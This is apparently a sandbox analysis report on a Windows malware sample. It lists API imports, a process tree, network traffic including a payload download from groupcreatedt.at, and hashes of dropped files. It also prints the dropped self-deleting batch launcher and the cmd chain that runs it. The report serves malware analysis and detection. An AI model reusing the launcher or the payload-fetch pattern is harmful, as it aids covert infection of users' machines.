cryptnet.dll.CryptGetObjectUrl
cryptnet.dll.I_CryptNetGetConnectivity
sensapi.dll.IsNetworkAlive
rpcrt4.dll.RpcBindingFromStringBindingW
rpcrt4.dll.RpcBindingSetAuthInfoExW
rpcrt4.dll.NdrClientCall3
cryptnet.dll.CryptRetrieveObjectByUrlW
setupapi.dll.SetupIterateCabinetW
cabinet.dll.#20
cabinet.dll.#22
devrtl.dll.DevRtlGetThreadLogToken
kernel32.dll.RegOpenKeyExW
kernel32.dll.RegCloseKey
cabinet.dll.#23
cryptsp.dll.CryptAcquireContextA
cryptsp.dll.CryptCreateHash
cryptsp.dll.CryptSetHashParam
cryptsp.dll.CryptImportKey
cryptsp.dll.CryptVerifySignatureA
cryptsp.dll.CryptDestroyKey
cryptsp.dll.CryptDestroyHash
cryptsp.dll.CryptHashData
sechost.dll.QueryServiceConfigA
sechost.dll.QueryServiceStatus
rpcrt4.dll.RpcStringBindingComposeA
rpcrt4.dll.RpcBindingFromStringBindingA
rpcrt4.dll.RpcEpResolveBinding
sechost.dll.LookupAccountSidLocalW
sechost.dll.LookupAccountNameLocalW
rpcrt4.dll.RpcStringFreeA
rpcrt4.dll.RpcBindingFree
winhttp.dll.WinHttpSetTimeouts
winhttp.dll.WinHttpCrackUrl
winhttp.dll.WinHttpGetDefaultProxyConfiguration
winhttp.dll.WinHttpGetIEProxyConfigForCurrentUser
cryptbase.dll.SystemFunction036
advapi32.dll.RegDeleteTreeA
advapi32.dll.RegDeleteTreeW
ole32.dll.CoTaskMemAlloc
ole32.dll.StringFromIID
nsi.dll.NsiAllocateAndGetTable
cfgmgr32.dll.CM_Open_Class_Key_ExW
iphlpapi.dll.ConvertInterfaceGuidToLuid
iphlpapi.dll.GetIfEntry2
iphlpapi.dll.GetIpForwardTable2
iphlpapi.dll.GetIpNetEntry2
iphlpapi.dll.FreeMibTable
ole32.dll.CoTaskMemFree
nsi.dll.NsiFreeTable
oleaut32.dll.#500
winhttp.dll.WinHttpGetProxyForUrl
winhttp.dll.WinHttpTimeFromSystemTime
winhttp.dll.WinHttpQueryHeaders
shlwapi.dll.StrStrIW
winhttp.dll.WinHttpQueryDataAvailable
winhttp.dll.WinHttpReadData
winhttp.dll.WinHttpCloseHandle
cryptnet.dll.I_CryptNetSetUrlCacheFlushInfo
bcryptprimitives.dll.GetAsymmetricEncryptionInterface
ncrypt.dll.BCryptImportKeyPair
ncrypt.dll.BCryptVerifySignature
ncrypt.dll.BCryptDestroyKey
winhttp.dll.WinHttpSetStatusCallback
crypt32.dll.CertVerifyCertificateChainPolicy
crypt32.dll.CertFreeCertificateChain
crypt32.dll.CertDuplicateCertificateContext
ncrypt.dll.SslEncryptPacket
ncrypt.dll.SslDecryptPacket
ole32.dll.CreateStreamOnHGlobal
crypt32.dll.CertFreeCertificateContext
user32.dll.GetShellWindow
ntdll.dll.RtlExitUserThread
kernel32.dll.CreateRemoteThread
advapi32.dll.GetUserNameW
ncrypt.dll.SslFreeObject
user32.dll.SetWindowsHookExA
user32.dll.RegisterClassA
user32.dll.CreateWindowExA
user32.dll.GetWindowLongPtrA
user32.dll.DefWindowProcA
user32.dll.SetWindowLongPtrA
user32.dll.SetClipboardViewer
user32.dll.IsClipboardFormatAvailable
user32.dll.GetClipboardOwner
user32.dll.RegisterDeviceNotificationA
user32.dll.GetMessageA
ws2_32.dll.#3
ncrypt.dll.SslDecrementProviderReferenceCount
ws2_32.dll.#116
"C:\Users\user\AppData\Local\Temp\E502\D8E1.bat" "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\LJEJZS~1.EXE"
cmd /c ""C:\Users\user\AppData\Local\Temp\E502\D8E1.bat" "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\LJEJZS~1.EXE""
C:\Users\user\AppData\Local\Temp\E502\D8E1.bat "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\LJEJZS~1.EXE"
cmd /C ""C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\LJEJZS~1.EXE""
"C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\LJEJZS~1.EXE"
C:\Windows\system32\svchost.exe
sneddddga
{2C15379C-9B8E-3EF3-8520-FF528954A3A6}
{C4CA9F68-5357-9674-FD38-372A81EC5BFE}

PE Information

Image Base 0x00400000
Entry Point 0x00405493
Reported Checksum 0x000578ee
Actual Checksum 0x000578ee
Minimum OS Version 5.1
Compile Time 2016-05-10 03:04:39
Import Hash cc79e5d1893e37143e121d47aeb51eb4

Sections

Name Virtual Address Virtual Size Size of Raw Data Characteristics Entropy
.text 0x00001000 0x00008212 0x00008400 IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 5.36
.data 0x0000a000 0x000006ca 0x00000800 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 0.64
.rsrc 0x0000b000 0x00045910 0x00045a00 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 8.00

Imports

Library advapi32.dll:
0x402000 CryptSignHashA
0x402004 InitializeAcl
0x402008 RegReplaceKeyW
0x40200c RegSaveKeyA
0x402010 IsTextUnicode
0x402014 RegCreateKeyExA
0x402018 RegLoadKeyA
0x40201c LogonUserA
0x402020 RegEnumKeyA
0x402024 OpenEventLogW
0x402028 ReadEventLogA
0x40202c RegRestoreKeyA
0x402030 RegUnLoadKeyW
Library kernel32.dll:
0x402038 GetProcAddress
0x40203c OpenWaitableTimerW
0x402040 GetTempPathA
0x402044 CreateFileW
0x402048 GetCurrencyFormatA
0x40204c FindResourceExW
0x402050 IsBadWritePtr
0x402054 InterlockedExchange
0x402058 FindFirstFileW
0x40205c GetFullPathNameW
0x402060 GetProfileStringA
0x402064 GlobalAddAtomW
0x402068 LoadLibraryExA
0x40206c SetEvent
0x402070 GetModuleHandleA
0x402074 CreateMutexA
0x402078 GetPriorityClass
0x40207c ReadFile
0x402080 lstrcmp
0x402084 GetConsoleTitleA
0x402088 CreateFileMappingW
0x40208c ResumeThread
0x402090 OpenMutexA
0x402094 FormatMessageW
0x402098 CreateSemaphoreW
0x4020a8 GetConsoleAliasA
0x4020ac GetStartupInfoA
0x4020b0 ReadConsoleW
0x4020b8 FindNextFileA
Library mprapi.dll:
0x4020c0 MprInfoBlockAdd
0x4020c4 MprAdminDeviceEnum
0x4020c8 MprInfoBlockFind
Library crypt32.dll:
0x4020d0 CryptMemFree
0x4020d8 CertFindExtension
0x4020e0 CertCloseStore
0x4020e4 CryptFindOIDInfo
0x4020e8 CertControlStore
0x4020ec CertDuplicateStore
0x4020f0 CryptDecodeMessage
0x4020f8 CertGetNameStringA
0x402104 CertAlgIdToOID
0x402108 CryptMemAlloc
Library certcli.dll:
0x402110 CACloseCA
0x402114 CAEnumFirstCA

.text
`.data
.rsrc
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
OpenEventLogW
RegUnLoadKeyW
CryptSignHashA
ReadEventLogA
IsTextUnicode
RegRestoreKeyA
RegLoadKeyA
RegCreateKeyExA
LogonUserA
RegEnumKeyA
RegReplaceKeyW
InitializeAcl
RegSaveKeyA
advapi32.dll
FindFirstFileW
CreateSemaphoreW
LoadLibraryExA
lstrcmp
ReadFile
CreateFileMappingW
GetFullPathNameW
InterlockedExchange
ResumeThread
GetPriorityClass
GetStartupInfoA
CreateFileW
GetPrivateProfileIntA
FormatMessageW
GetConsoleAliasA
GlobalAddAtomW
GetCurrencyFormatA
InterlockedIncrement
GetProfileStringA
SetEvent
ReadConsoleW
GetConsoleTitleA
GetModuleHandleA
FindNextFileA
GetProcAddress
WaitForSingleObjectEx
GetLogicalDriveStringsW
CreateMutexA
FindResourceExW
OpenWaitableTimerW
IsBadWritePtr
GetTempPathA
OpenMutexA
kernel32.dll
MprInfoBlockAdd
MprAdminDeviceEnum
MprInfoBlockFind
mprapi.dll
CryptMemFree
CertDuplicateStore
CryptMemAlloc
CertAlgIdToOID
CertFindExtension
CryptDecodeMessage
CertDuplicateCRLContext
CertGetNameStringA
CryptBinaryToStringA
CertCompareCertificate
CryptFindOIDInfo
CertControlStore
CertDeleteCRLFromStore
CertCloseStore
CertCreateCRLContext
crypt32.dll
CAEnumFirstCA
CACloseCA
certcli.dll
gbycfilt.dll
egggeProcessMemory
ggrnel32.dll
ggapCreate
oruqvrjjmiprs
ernibkis
sneddddga
hokoa.pdb
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
3QE*8
)cP=u
ZZ#bW
!-"*yv
X2;Hw
MqQ@\
[RK!kU
ljm,8
This file is not on VirusTotal.

Process Tree

  • LjejZswGjULF7Ng.exe 420
    • cmd.exe 2872 cmd /c ""C:\Users\user\AppData\Local\Temp\E502\D8E1.bat" "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\LJEJZS~1.EXE""
      • cmd.exe 992 cmd /C ""C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\LJEJZS~1.EXE""
        • corrawex.exe 2512 "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\LJEJZS~1.EXE"
  • explorer.exe 1632

LjejZswGjULF7Ng.exe, PID: 420, Parent PID: 2480
Full Path: C:\Users\user\AppData\Local\Temp\LjejZswGjULF7Ng.exe
Command Line: "C:\Users\user\AppData\Local\Temp\LjejZswGjULF7Ng.exe"
cmd.exe, PID: 2872, Parent PID: 420
Full Path: C:\Windows\SysWOW64\cmd.exe
Command Line: cmd /c ""C:\Users\user\AppData\Local\Temp\E502\D8E1.bat" "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\LJEJZS~1.EXE""
cmd.exe, PID: 992, Parent PID: 2872
Full Path: C:\Windows\SysWOW64\cmd.exe
Command Line: cmd /C ""C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\LJEJZS~1.EXE""
corrawex.exe, PID: 2512, Parent PID: 992
Full Path: C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
Command Line: "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\LJEJZS~1.EXE"
svchost.exe, PID: 2152, Parent PID: 2512
Full Path: C:\Windows\sysnative\svchost.exe
Command Line: C:\Windows\system32\svchost.exe
explorer.exe, PID: 1632, Parent PID: 1496
Full Path: C:\Windows\explorer.exe
Command Line: C:\Windows\Explorer.EXE

Hosts

Direct IP Country Name
Y 8.8.8.8 [VT] United States
N 23.202.161.73 [VT] United States
N 192.42.116.41 [VT] Netherlands
N 185.85.0.29 [VT] Germany
N 152.195.11.6 [VT] United States

TCP

Source Source Port Destination Destination Port
192.168.35.21 49188 152.195.11.6 www.download.windowsupdate.com 80
192.168.35.21 49230 152.195.11.6 www.download.windowsupdate.com 80
192.168.35.21 49182 185.85.0.29 www.php.net 80
192.168.35.21 49183 185.85.0.29 www.php.net 443
192.168.35.21 49225 185.85.0.29 www.php.net 80
192.168.35.21 49227 185.85.0.29 www.php.net 443
192.168.35.21 49226 192.42.116.41 groupcreatedt.at 80
192.168.35.21 49194 23.202.161.73 www.microsoft.com 80
192.168.35.21 49195 23.202.161.73 www.microsoft.com 80

UDP

Source Source Port Destination Destination Port
192.168.35.21 53447 8.8.8.8 53
192.168.35.21 57255 8.8.8.8 53
192.168.35.21 58094 8.8.8.8 53
192.168.35.21 65365 8.8.8.8 53

DNS

Name Response Post-Analysis Lookup
www.php.net [VT] A 185.85.0.29 [VT]
CNAME www-php-net.ax4z.com [VT]
www.download.windowsupdate.com [VT] A 152.195.11.6 [VT]
CNAME 2-01-3cf7-0009.cdx.cedexis.net [VT]
CNAME wu.ec.azureedge.net [VT]
CNAME wu.wpc.apr-52dd2.edgecastdns.net [VT]
CNAME cs611.wpc.edgecastcdn.net [VT]
CNAME wu.azureedge.net [VT]
www.microsoft.com [VT] CNAME www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net [VT]
CNAME e13678.dspb.akamaiedge.net [VT]
CNAME www.microsoft.com-c-3.edgekey.net [VT]
A 23.202.161.73 [VT]
groupcreatedt.at [VT] A 192.42.116.41 [VT]

HTTP Requests

URI Data
http://www.php.net/license/3_0.txt
GET /license/3_0.txt HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: www.php.net

http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1
Cache-Control: max-age = 86403
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Wed, 19 Apr 2017 22:43:31 GMT
If-None-Match: "80ab755e5eb9d21:0"
User-Agent: Microsoft-CryptoAPI/6.1
Host: www.download.windowsupdate.com

http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
GET /pki/certs/MicRooCerAut_2010-06-23.crt HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: www.microsoft.com

http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1
Cache-Control: max-age = 3600
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Wed, 26 Feb 2020 21:39:14 GMT
If-None-Match: "06d5b30edecd51:0"
User-Agent: Microsoft-CryptoAPI/6.1
Host: www.download.windowsupdate.com

http://groupcreatedt.at/key/x64.bin
GET /key/x64.bin HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: groupcreatedt.at

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Sorry! No dropped Suricata Extracted files.

JA3

Source Source Port Destination Destination Port JA3 Hash JA3 Description
192.168.35.21 49183 185.85.0.29 www.php.net 443 1d095e68489d3c535297cd8dffb06cb9 Non-Specific Microsoft Socket, Malware Test FP: brazil-malspam-pushes-banload, dhl-malspam-traffic, post-infection-traffic-from-terror-ek-payload, contract-malspam-traffic, cryptowall-traffic, fake-font-update-for-chrome, phishing-malware-run-on-vm, fiesta-ek-post-infection-and-click-fraud-traffic, phishing-malware-sandbox-analysis, angler-ek-traffic, goon-ek-traffic, magnitude-ek-traffic, brazil-malspam-solicitacao-de-orcamento-traffic-example, cryptowall-infection-on-vm, nuclear-ek-traffic, zeus-panda-banker-malspam-traffic, traffic-analysis-pop-quiz, netflix-phishing-traffic, malspam-pushing-remcosrat, sweet-orange-ek-traffic, brazil-malspam-traffic, eitest-hoelflertext-popup-sends-netsupport-manager-rat, eitest-hoeflertext-popup-sends-netsupport-rat, th-run-seamless-rig-ek-sends-ramnit-with-post-infection-traffic, nuclear-ek-from-my-infected-vm, fake-nf-e-malspam-traffic, fake-netflix-login-page-traffic-1st-run, payment-slip-malspam-traffic, rig-ek-traffic, malspam-pushing-smoke-loader, brazil-malspam-traffic-example, smoke-loader-traffic, phishing-malware-run-in-a-vm, boleto-malspam-traffic, infinity-ek-traffic
192.168.35.21 49227 185.85.0.29 www.php.net 443 1d095e68489d3c535297cd8dffb06cb9 Non-Specific Microsoft Socket, Malware Test FP: brazil-malspam-pushes-banload, dhl-malspam-traffic, post-infection-traffic-from-terror-ek-payload, contract-malspam-traffic, cryptowall-traffic, fake-font-update-for-chrome, phishing-malware-run-on-vm, fiesta-ek-post-infection-and-click-fraud-traffic, phishing-malware-sandbox-analysis, angler-ek-traffic, goon-ek-traffic, magnitude-ek-traffic, brazil-malspam-solicitacao-de-orcamento-traffic-example, cryptowall-infection-on-vm, nuclear-ek-traffic, zeus-panda-banker-malspam-traffic, traffic-analysis-pop-quiz, netflix-phishing-traffic, malspam-pushing-remcosrat, sweet-orange-ek-traffic, brazil-malspam-traffic, eitest-hoelflertext-popup-sends-netsupport-manager-rat, eitest-hoeflertext-popup-sends-netsupport-rat, th-run-seamless-rig-ek-sends-ramnit-with-post-infection-traffic, nuclear-ek-from-my-infected-vm, fake-nf-e-malspam-traffic, fake-netflix-login-page-traffic-1st-run, payment-slip-malspam-traffic, rig-ek-traffic, malspam-pushing-smoke-loader, brazil-malspam-traffic-example, smoke-loader-traffic, phishing-malware-run-in-a-vm, boleto-malspam-traffic, infinity-ek-traffic
File name corrawex.exe
Associated Filenames
C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
File Size 322048 bytes
File Type raw G3 data, byte-padded
MD5 0df2d1c29bfee269b458a7ff8364f79f
SHA1 767a97336567afc966588a68aa161f4df29157ec
SHA256 db311c2cdda01c83e73585784a33c17d67a595110d860db83946a6c08113e348
CRC32 B78DED38
Ssdeep 6144:MoxAQURWtJ8ru6Cf6kkRrrsNSc6bkuk+QyR3/oOYW39sE6cXsQFqvCE:5TH8ru5kEu9tx/kWtvfFYCE
ClamAV None
Yara
  • embedded_win_api - A non-Windows executable contains win32 API functions names
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
File name D8E1.bat
Associated Filenames
C:\Users\user\AppData\Local\Temp\E502\D8E1.bat
File Size 110 bytes
File Type ASCII text, with CRLF line terminators
MD5 2d9ea84817b0c920856a5d7ce5ea2e6f
SHA1 0139fc1c7213d9ec8c2b782d55c9a8be24376913
SHA256 19d5cbc1efe7e24a43a4a9566d1800afc565ca3aaeb5711d0ddd3a7f38f8685f
CRC32 C9E62E24
Ssdeep 3:9G6OWRNfebnWdoe8JgU64vHXMJATkUElXUNVWdoZkwn:9NRMje87vvHXMJ2dkEnjiwn
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file Display Text
:13824657
if not exist %1 goto 4281142638
cmd /C "%1 %2"
if errorlevel 1 goto 13824657
:4281142638
del %0
File name corrawex.exe
Associated Filenames
C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
C:\Users\user\AppData\Local\Temp\LjejZswGjULF7Ng.exe
File Size 322048 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 0116e1cc3ef60e3cb910654c95e1d1c6
SHA1 a9126493e87f3f761efe8ae9aed4cc4e58ed819e
SHA256 ddaa6aba4618362ad65ad4d6eb6d1ff7cc909f9dcb98b0aa2c6627a2a7d5b514
CRC32 588CA946
Ssdeep 6144:BoxAQURWtJ8ru6Cf6kkRrrsNSc6bkuk+QyR3/oOYW39sE6cXsQFqvCE:KTH8ru5kEu9tx/kWtvfFYCE
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
File name Cab5CB0.tmp
Associated Filenames
C:\Users\user\AppData\Local\Temp\Cab5CB0.tmp
C:\Users\user\AppData\Local\Temp\Cab5D2F.tmp
File Size 52608 bytes
File Type Microsoft Cabinet archive data, 52608 bytes, 1 file
MD5 ff9672cd98bf5d41722d2d1207344c67
SHA1 98ebe6d49d1d9d4add4bf9219fe2ded40cba33f3
SHA256 756f4d557302e49bce6623db9bd324c7b05c36b8bb884bbefbbe6b7f53422a54
CRC32 2CA25202
Ssdeep 1536:hnbq9Gl2ifWyUQeydcYDAdN6CtfC8KAZc3kJTiD:hnbq9GQQW7NYDZCw5AZc3r
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
File name Tar5CB1.tmp
Associated Filenames
C:\Users\user\AppData\Local\Temp\Tar5CB1.tmp
C:\Users\user\AppData\Local\Temp\Tar5D30.tmp
File Size 125286 bytes
File Type data
MD5 8237156ad13c2cd7c5cc2faa6969fd86
SHA1 e5481457795650900ee04db955c87224e2db32f0
SHA256 1a9094d2695f9bfbbf047639227e94f9e838cb0bee18e14b1aed00054faef825
CRC32 9C009AE7
Ssdeep 1536:oFAWrmqK1EYqbyr0CpXU4SwucWzvVPIM/P/CGv:oBK1LrVXPEcWOMP/D
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
File name 94308059B57B3142E455B38A6EB92015
Associated Filenames
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
C:\Users\user\AppData\Local\Temp\Cab658A.tmp
C:\Users\user\AppData\Local\Temp\Cab767D.tmp
C:\Users\user\AppData\Local\Temp\Cab78C0.tmp
C:\Users\user\AppData\Local\Temp\Cab9A5B.tmp
C:\Users\user\AppData\Local\Temp\Cab9FD9.tmp
C:\Users\user\AppData\Local\Temp\CabA01A.tmp
C:\Users\user\AppData\Local\Temp\CabA20F.tmp
File Size 57121 bytes
File Type Microsoft Cabinet archive data, 57121 bytes, 1 file
MD5 0ec1dc356bbe2c2cb76e83e51e54c290
SHA1 49b409e5df72dd6d43d6cff0940dcd7a0e9bf576
SHA256 47c69130af70998da627189acc578c2081ebc235eeb4c2c4fcd55e7126a13890
CRC32 E7C735A0
Ssdeep 1536:9ieuRGIYY2/h2OAdzzTP4Mq/HI8/E0IYeDFR3XaWs4:9eBV25Kzzr4zfIl0EDaH4
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
File name 94308059B57B3142E455B38A6EB92015
Associated Filenames
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
File Size 342 bytes
File Type data
MD5 76e9cdbcd85a16a4143d4208e5f3c677
SHA1 ffbed2aa712cebd432e96a5f5dc83ff5a20a2f1b
SHA256 b10811a223cd84180e3fbcfc24708da8bd32e19f4818834448d7f84ac63825c7
CRC32 0ECC3D70
Ssdeep 6:kK8XTxW4Y+SkQlPlEGYRMY9z+4KlDA3RUe5CAE:8TxWokPlE99SNxAhUe5Y
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
File name 94308059B57B3142E455B38A6EB92015
Associated Filenames
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
File Size 342 bytes
File Type data
MD5 eef8efa8e5ef5f312b25701da4157991
SHA1 cc881edcfd134733b17dcb79451f25f6161cba39
SHA256 ac01c65e45a11820480919a8a288a8e4372139ca9d6c01f86ec149527d2db613
CRC32 DD53C3A9
Ssdeep 6:kK8Xy81pxW4Y+SkQlPlEGYRMY9z+4KlDA3RUe5CAE:8y0pxWokPlE99SNxAhUe5Y
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
File name Tar658B.tmp
Associated Filenames
C:\Users\user\AppData\Local\Temp\Tar658B.tmp
C:\Users\user\AppData\Local\Temp\Tar767E.tmp
C:\Users\user\AppData\Local\Temp\Tar78C1.tmp
C:\Users\user\AppData\Local\Temp\Tar9A5C.tmp
C:\Users\user\AppData\Local\Temp\Tar9FDA.tmp
C:\Users\user\AppData\Local\Temp\TarA01B.tmp
C:\Users\user\AppData\Local\Temp\TarA210.tmp
File Size 144697 bytes
File Type data
MD5 c1dcbe728573780e2494bdad85364640
SHA1 4eb346a0ef16a5d82921369fb923134afdb6c2ce
SHA256 c308a174d279757b662c990a77b081af05cb4d7587d7e529764dd74013d62106
CRC32 7E692B86
Ssdeep 1536:w860v3gAurbFCLxR09oLRYpHdT20LrVY/jKQu8OXflvu:wvauuxR0aRYlEjKn8ofRu
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
File name F0ACCF77CDCBFF39F6191887F6D2D357
Associated Filenames
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
File Size 1521 bytes
File Type data
MD5 a266bb7dcc38a562631361bbf61dd11b
SHA1 3b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256 df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
CRC32 53112384
Ssdeep 24:f5DuDD02FDuDD0xlGUCpMTlAXLOhT/g+vVp5cVQyPE5LTl79lazjY:hDuDD02FDuDD0xwUCylA7P+vVmQ6gR73
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
File name F0ACCF77CDCBFF39F6191887F6D2D357
Associated Filenames
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
File Size 242 bytes
File Type data
MD5 a7317835e944073879671b7d76c83b1d
SHA1 687a2bdafd6f5b1bef2c836d951da57b87951d03
SHA256 a9e0dac20eeef177cd62a565af244b9b98f4dbe6d923c7fab07f2ab39c2ed6d0
